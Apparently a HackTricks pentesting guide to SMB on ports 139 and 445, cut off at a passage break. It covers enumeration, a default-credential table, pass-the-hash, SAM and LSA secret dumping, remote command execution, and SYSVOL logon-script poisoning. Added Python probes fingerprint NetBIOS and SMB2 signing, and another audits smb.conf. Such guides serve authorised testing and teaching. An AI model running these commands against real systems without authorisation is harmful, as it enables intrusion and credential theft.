139,445 - Pentesting SMB
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Port 139
Network Basic Input Output System (NetBIOS) is a software protocol designed to enable applications, PCs, and desktops within a local area network (LAN) to interact with network hardware and to facilitate the transmission of data across the network. Applications running on a NetBIOS network are identified and located through their NetBIOS names, which are 16 bytes long (15 characters of name plus a one-byte suffix that identifies the service type, e.g. <20> for the file server service) and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a "call" command to another application (acting as the server) over TCP port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Technically, port 139 is referred to as "NBT over IP", whereas port 445 is identified as "SMB over IP". The acronym SMB stands for "Server Message Blocks"; the protocol is also known as the Common Internet File System (CIFS), although strictly speaking CIFS is the name of the SMB1 dialect and SMB2/SMB3 are not CIFS. As an application-layer network protocol, SMB/CIFS is primarily used to enable shared access to files, printers and serial ports, and to facilitate various forms of communication between nodes on a network.
For instance, in the context of Windows, SMB can operate directly over TCP/IP through port 445, eliminating the need for NetBIOS over TCP/IP. Conversely, when port 139 is used, SMB is being carried on top of NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
The Server Message Block (SMB) protocol, operating in a client-server model, is designed to regulate access to files, directories and other network resources such as printers and routers. Primarily used within the Windows operating system series, SMB ensures backward compatibility, allowing devices running newer Microsoft operating system versions to interact seamlessly with those running older versions. Additionally, the Samba project offers a free software implementation of SMB for Linux and Unix systems, enabling cross-platform communication through SMB.
Shares, representing arbitrary parts of the local file system, can be provided by an SMB server, making the hierarchy visible to a client partly independently of the server's actual structure. The Access Control Lists (ACLs), which define access rights, allow fine-grained control over user permissions, including attributes such as execute, read and full access. These permissions can be assigned to individual users or groups per share, and are distinct from the local permissions set on the server.
IPC$ Share
Access to the IPC$ share can be obtained through an anonymous null session, allowing interaction with services exposed via named pipes. The tool enum4linux is useful for this purpose. Used properly, it enables the acquisition of:
- Information on the operating system
- Details on the parent domain
- A compilation of local users and groups
- Information on available SMB shares
- The effective system security policy
This functionality is critical for network administrators and security professionals to assess the security posture of SMB (Server Message Block) services on a network. enum4linux provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential weaknesses and ensuring that the SMB services are properly secured. Note that recent Windows versions deny or heavily restrict null sessions by default, so expect most of this output to require at least guest or low-privileged credentials.
enum4linux -a target_ip
The above command is an example of how enum4linux can be used to perform a full enumeration against a target specified by target_ip.
What is NTLM
If you don't know what NTLM is, or you want to know how it works and how to abuse it, you will find this page about NTLM very interesting: it explains how the protocol works and how you can take advantage of it:
Server Enumeration
Scan the network searching for hosts:
nbtscan -r 192.168.0.1/24
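As an added example (not part of the original page or of nbtscan), the Python below does what nbtscan does for a single host: it builds the NBSTAT node-status query for the wildcard name and decodes the reply, including the one-byte service suffix that distinguishes a workstation name (<00>) from a file server (<20>) or the domain controllers group (<1C>). The reply it parses is constructed inline for the demo; probe() is the only function that touches the network.

```python
#!/usr/bin/env python3
"""NetBIOS name encoding and a NBSTAT (node status) probe, the query nbtscan sends.

Added example, not code from the page or from nbtscan. sample_response() is a
constructed reply for the demo, not a real capture.
"""
import socket
import struct

NBSTAT = 0x0021  # NetBIOS node status record type (RFC 1002)
# Meaning of the 16th ("suffix") byte of a NetBIOS name (RFC 1001/1002 + Microsoft usage)
SUFFIX_MEANING = {
    0x00: "Workstation service (computer name; domain/workgroup if group)",
    0x03: "Messenger service",
    0x1B: "Domain Master Browser (PDC emulator)",
    0x1C: "Domain Controllers group",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server service (SMB)",
}


def encode_netbios_name(name, suffix=0x00, pad=b" "):
    """First-level encoding: 15 bytes of name + 1 suffix byte, each nibble mapped to 'A'..'P'."""
    raw = name.upper().encode("ascii")
    if len(raw) > 15:
        raise ValueError("NetBIOS names are at most 15 characters plus a 1-byte suffix")
    raw = raw.ljust(15, pad) + bytes([suffix])
    return b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name: returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS names are exactly 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("ascii", "replace"), raw[15]


def build_nbstat_query(txid=0x1337):
    """Node status request for the wildcard name '*' (NUL padded): the 50-byte probe nbtscan sends."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags 0: query, no broadcast
    question = b"\x20" + encode_netbios_name("*", 0x00, pad=b"\x00") + b"\x00"
    return header + question + struct.pack(">HH", NBSTAT, 0x0001)


def parse_nbstat_response(data):
    """Extract registered names, their suffixes and the MAC from a node status response."""
    txid, flags, _qd, an = struct.unpack_from(">HHHH", data, 0)
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a NBSTAT response")
    off = 12 + 34  # 12-byte header, then the echoed 34-byte wildcard name
    rtype, _rclass, _ttl, _rdlen = struct.unpack_from(">HHIH", data, off)
    if rtype != NBSTAT:
        raise ValueError("unexpected record type %#x" % rtype)
    off += 10
    num_names, off = data[off], off + 1
    names = []
    for _ in range(num_names):
        raw, suffix = data[off:off + 15], data[off + 15]
        nflags = struct.unpack_from(">H", data, off + 16)[0]
        names.append({
            "name": raw.rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": suffix,
            "meaning": SUFFIX_MEANING.get(suffix, "unknown"),
            "group": bool(nflags & 0x8000),  # group names are domains/workgroups, not hosts
        })
        off += 18
    mac = data[off:off + 6]  # the statistics block starts with the unit ID (MAC address)
    return {"txid": txid, "names": names, "mac": ":".join("%02x" % b for b in mac)}


def is_domain_controller(parsed):
    """A host that registers the <domain>[1C] group name is a domain controller."""
    return any(n["suffix"] == 0x1C and n["group"] for n in parsed["names"])


def probe(host, timeout=2.0):
    """Send the NBSTAT query to UDP/137 and parse the reply (network use; not run by the demo)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(), (host, 137))
        data, _ = s.recvfrom(1024)
    return parse_nbstat_response(data)


def sample_response(txid=0x1337):
    """Constructed reply of a domain-joined file server (not a real capture)."""
    entries = [(b"FILESRV01", 0x00, 0x0400), (b"FILESRV01", 0x20, 0x0400),
               (b"CORP", 0x00, 0x8400), (b"CORP", 0x1C, 0x8400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes.fromhex("001122334455") + b"\x00" * 40  # unit ID (MAC) + rest of statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response + authoritative
    rrname = b"\x20" + encode_netbios_name("*", 0x00, pad=b"\x00") + b"\x00"
    return header + rrname + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata)) + rdata


if __name__ == "__main__":
    info = parse_nbstat_response(sample_response())
    for n in info["names"]:
        print("%-15s <%02X> %-5s %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "", n["meaning"]))
    print("MAC:", info["mac"], "| domain controller:", is_domain_controller(info))
```

Run it against a real target with probe("10.10.10.10"); nbtscan -r does the same for every address of the range. Names flagged GROUP are domains or workgroups, and a <1C> group entry tells you the box is a DC before you ever touch 445.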
SMB server version
To look for possible exploits for the SMB version it is important to know which version is being used. If this information does not appear in the other tools used, you can:
- Use the MSF auxiliary module auxiliary/scanner/smb/smb_version
- Or this script:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# Adjust the capture interface (tap0 below) to the one facing the target.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
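Added example (not from the page, Metasploit or nmap): a minimal SMB2 NEGOTIATE client in Python that extracts what smb_version and nmap's smb2-security-mode report, namely the dialect the server selects and its SecurityMode flags. The response it decodes is constructed inline; probe() sends the same request to a real host on 445. The signing check is also the precondition for the SMB relay attack described further down this page: relay only works against servers that do not set SIGNING_REQUIRED.

```python
#!/usr/bin/env python3
"""Fingerprint an SMB server at protocol level: send an SMB2 NEGOTIATE and read back the
dialect the server picked and its SecurityMode (signing enabled / signing required).

Added example, not code from the page, Metasploit or nmap. sample_response() is a
constructed server reply for the demo, not a real capture.
"""
import socket
import struct
import uuid

SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x01   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x02  # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1", 0x02FF: "SMB 2.??? (wildcard)"}


def smb2_header(command, flags=0, message_id=0):
    """64-byte SMB2 header (MS-SMB2 2.2.1), unsigned; flags=0x01 marks a server response."""
    return struct.pack("<4sHHIHHIIQIIQ16s",
                       b"\xfeSMB", 64, 0, 0, command, 1, flags, 0,
                       message_id, 0, 0, 0, b"\x00" * 16)


def negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)):
    """Direct-TCP framed NEGOTIATE request (MS-SMB2 2.2.3). 0x0311 is left out on purpose:
    SMB 3.1.1 requires negotiate contexts (pre-auth integrity), which a fingerprinter does not need."""
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0,
                       uuid.uuid4().bytes_le, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    pkt = smb2_header(SMB2_NEGOTIATE) + body
    return struct.pack(">I", len(pkt)) + pkt  # 4-byte transport header: type 0x00 + 24-bit length


def parse_negotiate_response(data):
    """Decode a framed NEGOTIATE response (MS-SMB2 2.2.4) into the facts a pentester cares about."""
    length = struct.unpack(">I", data[:4])[0] & 0x00FFFFFF
    smb = data[4:4 + length]
    if smb[:4] != b"\xfeSMB" or len(smb) < 64 + 64:
        raise ValueError("not an SMB2 NEGOTIATE response")
    status, command = struct.unpack_from("<IH", smb, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("unexpected command %#x / status %#010x" % (command, status))
    (_size, sec_mode, dialect, _ctx_count, guid, caps, _max_trans, max_read, _max_write,
     _sys_time, _start_time, _sec_off, _sec_len, _ctx_off) = struct.unpack_from(
        "<HHHH16sIIIIQQHHI", smb, 64)
    return {
        "dialect": DIALECTS.get(dialect, "unknown (%#06x)" % dialect),
        "dialect_code": dialect,
        "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
        "signing_required": bool(sec_mode & SIGNING_REQUIRED),
        # stable per host: spots the same machine behind several IPs / hostnames
        "server_guid": str(uuid.UUID(bytes_le=guid)),
        "capabilities": caps,
        "max_read": max_read,
        "relay_candidate": not sec_mode & SIGNING_REQUIRED,
    }


def probe(host, port=445, timeout=5.0):
    """Talk to a real server. This framing is for direct TCP (445); on 139 a NetBIOS
    Session Request (type 0x81) naming the server must be sent first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        data = s.recv(4096)
    return parse_negotiate_response(data)


def sample_response(dialect=0x0302, sec_mode=SIGNING_ENABLED,
                    guid="6ba7b810-9dad-11d1-80b4-00c04fd430c8"):
    """Constructed server reply (not a real capture) for the demo/test."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, sec_mode, dialect, 0,
                       uuid.UUID(guid).bytes_le, 0x2F, 0x800000, 0x800000, 0x800000,
                       0, 0, 128, 0, 0) + b"\x00"  # one byte of (empty) security buffer
    pkt = smb2_header(SMB2_NEGOTIATE, flags=0x01) + body
    return struct.pack(">I", len(pkt)) + pkt


if __name__ == "__main__":
    for label, resp in (("member server", sample_response()),
                        ("domain controller", sample_response(0x0311, SIGNING_ENABLED | SIGNING_REQUIRED))):
        r = parse_negotiate_response(resp)
        print("%-17s %-9s signing required=%-5s relay candidate=%s" % (
            label, r["dialect"], r["signing_required"], r["relay_candidate"]))
```

A server that only answers SMB1 (\xffSMB) or drops the connection will raise here; that by itself is a useful fingerprint, since SMB2 has been mandatory on Windows since Vista/2008 and a SMB1-only box is an old or misconfigured one.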
Search exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Possible Credentials
| Username | Common passwords |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
SMB Environment Information
Obtain Information
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Enumerate Users, Groups & Logged-On Users
This information should already have been collected by enum4linux and enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Enumerate local users
lookupsid.py -no-pass hostname.local
One-liner
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Enumerate local users
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Enumerating LSARPC and SAMR with rpcclient
GUI connection from linux
In the terminal:
xdg-open smb://cascade.htb/
In a file browser window (nautilus, thunar, etc.)
smb://friendzone.htb/general/
Shared Folders Enumeration
List shared folders
It is always recommended to check whether you can access anything; if you don't have credentials try using null credentials/the guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Pass-the-Hash
Connect/List a shared folder
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' [--pw-nt-hash] //<IP>/<Folder> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Manually enumerate windows shares and connect to them
It may be that you are restricted from listing the shares of the host machine, so when you try to list them it looks as if there are no shares to connect to. It is therefore worth a short try to connect to shares manually. When enumerating shares manually, look for responses such as NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME while using a valid session (e.g. a null session or valid credentials). These tell you whether the share exists but you have no access to it, or whether the share does not exist at all.
Common share names for windows targets are
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Common share names from Network Security Assessment 3rd edition)
You can try to connect to them by using the following command
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
or this script (using a null session)
#!/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in "${shares[@]}"; do
    output=$(smbclient -U '%' -N \\\\$ip\\$share -c '' 2>&1) # capture stderr too so an error is never mistaken for success
    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
    else
        echo "$output" # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
examples
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Enumerate shares from Windows / without third party tools
PowerShell
# Retrieves the SMB shares on the local computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
CMD console
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (graphical)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (graphical): enter \\<ip>\ to see the available non-hidden shares.
Mount a shared folder
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Download files
Read the previous sections to learn how to connect with credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Commands:
- mask: specifies the mask used to filter the files within the directory (e.g. "" for all files)
- recurse: toggles recursion on (default: off)
- prompt: toggles prompting for filenames off (default: on)
- mget: copies all files matching the mask from the host to the client machine
(Information from the manpage of smbclient)
Domain Shared Folders Search
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider:
-M spider_plus [--share <share_name>] --pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Especially interesting files on shares are those called Registry.xml, as they may contain passwords for users configured with autologon via Group Policy, and web.config files, as they contain credentials.
Tip
The SYSVOL share is readable by all authenticated users in the domain. In there you may find many different batch, VBScript and PowerShell scripts. You should check the scripts inside it, as you might find sensitive info such as passwords. Also, don't trust automated share listings: even if a share looks read-only, the underlying NTFS ACLs may allow writes. Always test with smbclient by uploading a small file to
\\<dc>\SYSVOL\<domain>\scripts\. If writable, you can poison logon scripts for RCE at user logon.
ShareHound – OpenGraph collector for SMB shares (BloodHound)
ShareHound discovers domain SMB shares, traverses them, extracts ACLs, and emits an OpenGraph JSON file for BloodHound CE/Enterprise.
- Baseline collection:
  - LDAP: enumerate computer objects, read dNSHostName
  - DNS: resolve each host
  - SMB: enumerate shares on reachable hosts
  - Traverse shares (BFS/DFS), enumerate files/folders, record permissions
ShareQL-driven traversal
- ShareQL is a first-match-wins DSL to allow/deny traversal by host/share/path and set a per-rule max depth. Target interesting shares and cap recursion.
Example ShareQL rules
# Only crawl shares with name containing "backup", up to depth 2
allow host * share * path * depth 0
allow host * share *backup* path * depth 2
deny host * share * path *
Usage
sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
-rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
- Provide AD credentials with -ad/-au/-ap (or -ad together with -au/-ap). Use -r/-rf for inline rules or rule files.
- Output: OpenGraph JSON; import it into BloodHound to query hosts/shares/files and effective rights.
- Tip: keep the max depth at 1–2 unless your filters are very strict.
BloodHound attack-surface queries
- Principals with write-like access on shares
MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
RETURN x
- Principals with FULL_CONTROL on shares
MATCH (p:Principal)-[r]->(s:NetworkShareSMB)
WHERE (p)-[:CanDelete]->(s) AND (p)-[:CanDsControlAccess]->(s) AND (p)-[:CanDsCreateChild]->(s)
  AND (p)-[:CanDsDeleteChild]->(s) AND (p)-[:CanDsDeleteTree]->(s) AND (p)-[:CanDsListContents]->(s)
  AND (p)-[:CanDsListObject]->(s) AND (p)-[:CanDsReadProperty]->(s) AND (p)-[:CanDsWriteExtendedProperties]->(s)
  AND (p)-[:CanDsWriteProperty]->(s) AND (p)-[:CanReadControl]->(s) AND (p)-[:CanWriteDacl]->(s)
  AND (p)-[:CanWriteOwner]->(s)
RETURN p,r,s
- Find sensitive files by extension (e.g. VMDKs)
MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
WHERE toLower(f.extension) = toLower(".vmdk")
RETURN p
Read Registry
You may be able to read the registry using some discovered credentials. Impacket reg.py allows you to try:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
The default configuration of a Samba server is usually located in /etc/samba/smb.conf and might contain some dangerous settings:
| Setting | Description |
|---|---|
| browseable = yes | Is the share advertised when the available shares are listed? (hidden shares are still reachable by name) |
| read only = no | Is the share read-only? "no" means files can be created and modified (equivalent to writable = yes) |
| writable = yes | Can users create and modify files? |
| guest ok = yes | Can the share be accessed without a password? |
| enable privileges = yes | Are privileges assigned to specific SIDs honoured? |
| create mask = 0777 | Which permissions are assigned to newly created files? |
| directory mask = 0777 | Which permissions are assigned to newly created directories? |
| logon script = script.sh | Which script is executed on the user's login? |
| magic script = script.sh | Which script should be executed when the script gets closed? |
| magic output = script.out | Where is the output of the magic script stored? |
The command smbstatus gives information about the server and about who is connected.
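Added example (not Samba's or the page's own code): a small Python audit that parses an smb.conf and flags the settings from the table above, resolving Samba's synonyms (public = guest ok, writeable = writable, read only = no) and applying the [global] defaults to each share the way Samba does. The configuration it checks is constructed for the demo.

```python
#!/usr/bin/env python3
"""Audit a Samba smb.conf for the dangerous settings listed in the table above.

Added example, not code from the page or from the Samba project. SAMPLE_SMB_CONF is a
constructed configuration for the demo, not a real server's file.
"""
import re

# Samba treats these parameter names as the same setting
SYNONYMS = {"public": "guest ok", "writeable": "writable", "write ok": "writable"}
TRUE, FALSE = {"yes", "true", "1"}, {"no", "false", "0"}
EXEC_HOOKS = ("logon script", "magic script", "magic output", "preexec", "postexec",
              "root preexec", "root postexec")
MODE_PARAMS = ("create mask", "directory mask", "force create mode", "force directory mode")

SAMPLE_SMB_CONF = """
[global]
   workgroup = CORP
   server string = File server   ; a comment
   enable privileges = yes

[public]
   path = /srv/public
   public = yes
   writeable = yes
   browseable = yes
   create mask = 0777

[finance]
   path = /srv/finance
   read only = no
   valid users = @finance
   magic script = cleanup.sh

[readonly]
   path = /srv/docs
   read only = yes
   guest ok = no
"""


def _norm_key(key):
    # Samba parameter names are case- and whitespace-insensitive; map synonyms to one name
    k = re.sub(r"\s+", " ", key.strip().lower())
    return SYNONYMS.get(k, k)


def parse_smb_conf(text):
    """Return {section: {param: value}}; '#'/';' comment lines and blank lines are skipped."""
    conf, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][_norm_key(key)] = value.split(";")[0].strip()  # drop trailing comment
    return conf


def effective_params(conf, share):
    """Share-level values override [global] defaults, as Samba applies them."""
    merged = dict(conf.get("global", {}))
    merged.update(conf[share])
    return merged


def audit_smb_conf(text):
    """Return a list of (section, setting, why it matters) findings."""
    conf = parse_smb_conf(text)
    findings = []
    g = conf.get("global", {})
    if g.get("enable privileges", "").lower() in TRUE:
        findings.append(("global", "enable privileges = %s" % g["enable privileges"],
                         "privileges granted to SIDs (e.g. SeDiskOperatorPrivilege) are honoured"))
    for share in conf:
        if share.lower() == "global":
            continue
        p = effective_params(conf, share)

        def val(k):
            return p.get(k, "").lower()

        guest = val("guest ok") in TRUE
        writable = val("writable") in TRUE or val("read only") in FALSE
        if guest:
            findings.append((share, "guest ok = yes", "reachable with a null/anonymous session"))
        if writable:
            why = "clients can create and modify files" + (" without a password" if guest else "")
            findings.append((share, "writable (writable = yes or read only = no)", why))
        for k in MODE_PARAMS:  # world-writable bit set on new files/dirs
            if k in p and int(p[k], 8) & 0o002:
                findings.append((share, "%s = %s" % (k, p[k]), "new files/dirs are world-writable on disk"))
        for k in EXEC_HOOKS:
            if k in p:
                findings.append((share, "%s = %s" % (k, p[k]), "server-side script execution hook"))
    return findings


if __name__ == "__main__":
    for section, setting, why in audit_smb_conf(SAMPLE_SMB_CONF):
        print("[%s] %-45s %s" % (section, setting, why))
```

browseable is deliberately not flagged: it is the default and only affects listing, and the manual enumeration section above shows that unlisted shares are still reachable by name. To audit a real server, read its file with open("/etc/samba/smb.conf").read() (or testparm -s for the fully resolved configuration) and pass the text to audit_smb_conf().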
Authenticate using Kerberos
You can authenticate with kerberos using the tools smbclient and rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return STATUS_NOT_SUPPORTED. Fix the common Kerberos pitfalls and force Kerberos auth:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
For the complete client setup (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) see:
88tcp/udp - Pentesting Kerberos
Execute Commands
crackmapexec
crackmapexec can execute commands using any of mmcexec, smbexec, atexec or wmiexec, with wmiexec being the default method. You can indicate the option you prefer with the --exec-method parameter:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSA secrets / in-memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
